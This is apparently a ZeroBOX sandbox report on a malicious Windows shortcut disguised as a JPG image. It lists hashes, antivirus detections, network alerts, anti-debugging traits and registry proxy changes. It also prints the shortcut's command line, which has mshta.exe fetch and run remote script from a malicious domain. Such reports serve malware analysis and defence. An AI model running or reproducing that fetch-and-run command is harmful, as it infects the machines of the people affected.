Summary | ZeroBOX

ADGMP-EC-AGB-June21.jpg.lnk

AntiVM AntiDebug GIF Format
Category: FILE
Machine: s1_win7_x6402
Started: Aug. 5, 2021, 10:54 a.m.
Completed: Aug. 5, 2021, 10:57 a.m.
Size 1.4KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=325, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Fri Jun 18 23:00:04 2021, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hide
MD5 6ef8991c1fef9c553e7cc9b2ba4517bd
SHA256 61df8bc3aed05ea399d31063e27b10f7cb0e05ae76090ff3befb6cfd255adf07
CRC32 B27C5896
ssdeep 24:8BR/jbhb8AUP6A+3Viwcrxcx4I0WYctXQaR3+PUGgctCGO+/efmv0:8BlxUCA43OI/Xv3ZbmvO5U
Yara
  • Lnk_Format_Zero - LNK Format

Name Response Post-Analysis Lookup
bsnlplots.com 172.67.221.235

IP Address Status Action
104.21.54.4 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
flow: TCP 192.168.56.102:49165 -> 104.21.54.4:443
sid: 906200056
signature: SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
category: undefined

Suricata TLS

Flow Issuer Subject Fingerprint
flow: TLSv1 192.168.56.102:49165 -> 104.21.54.4:443
issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
fingerprint: fd:49:9b:03:bf:ec:8d:81:dc:c1:61:c4:9e:5f:3d:c1:19:e9:29:1f

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1  return: 1  repeated: 0
request GET https://bsnlplots.com/css/css/b/l/i2.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d82000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x737b3000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
file C:\Users\test22\AppData\Local\Temp\ADGMP-EC-AGB-June21.jpg.lnk
cmdline "C:\Windows\System32\mshta.exe" https://bsnlplots.com/css/css/b/l/i2.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002e0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1  return: 0  repeated: 0
FireEye Heur.BZC.YAX.Nioc.1.0593947D
BitDefender Heur.BZC.YAX.Nioc.1.0593947D
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0593947D
Ad-Aware Heur.BZC.YAX.Nioc.1.0593947D
Emsisoft Heur.BZC.YAX.Nioc.1.0593947D (B)
Sophos Troj/DownLnk-X
MAX malware (ai score=87)
Microsoft Trojan:Script/Wacatac.B!ml
GData Heur.BZC.YAX.Nioc.1.0593947D
ALYac Heur.BZC.YAX.Nioc.1.0593947D
Zoner Probably Heur.LNKScript
Qihoo-360 ex_virus.lnk.lnkcmd.c
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002e0
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
status: 1  return: 0  repeated: 0
Process injection Process 760 resumed a thread in remote process 2180
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2180
status: 1  return: 0  repeated: 0